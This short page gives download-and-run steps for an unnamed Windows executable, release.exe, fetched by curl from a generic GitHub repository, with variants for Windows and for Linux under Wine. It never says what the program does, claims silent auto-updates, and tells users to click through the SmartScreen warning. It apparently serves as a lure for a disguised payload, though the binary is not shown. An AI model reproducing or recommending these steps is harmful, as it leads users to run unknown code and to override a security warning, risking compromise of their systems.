Portable · single .exe No installer Auto-updates every 48h

Download the archive

Open the Download page, accept the MIT license and grab release.zip.

Extract

Right-click the archive and choose “Extract All”, or via PowerShell:

PowerShell
PS> Expand-Archive -Path .\release.zip -DestinationPath .\release
PS> cd .\release

Run

Double-click release.exe, or launch it from the terminal:

cmd.exe
> .\release.exe
SmartScreen may warn on first launch. Click “More info → Run anyway” if you trust the source.

Download via curl

bash
$ curl -LO https://github.com/adrianstykles10/release-setup-2026/releases/download/release/release.zip

Or download manually from the Download page.

Extract

bash
$ unzip release.zip -d ~/release
$ cd ~/release

Install Wine (if not installed)

The build is a Windows binary — run it under Wine.

bash · debian / ubuntu
$ sudo apt update && sudo apt install -y wine
bash · arch
$ sudo pacman -S wine
bash · fedora
$ sudo dnf install -y wine

Run

bash
$ wine release.exe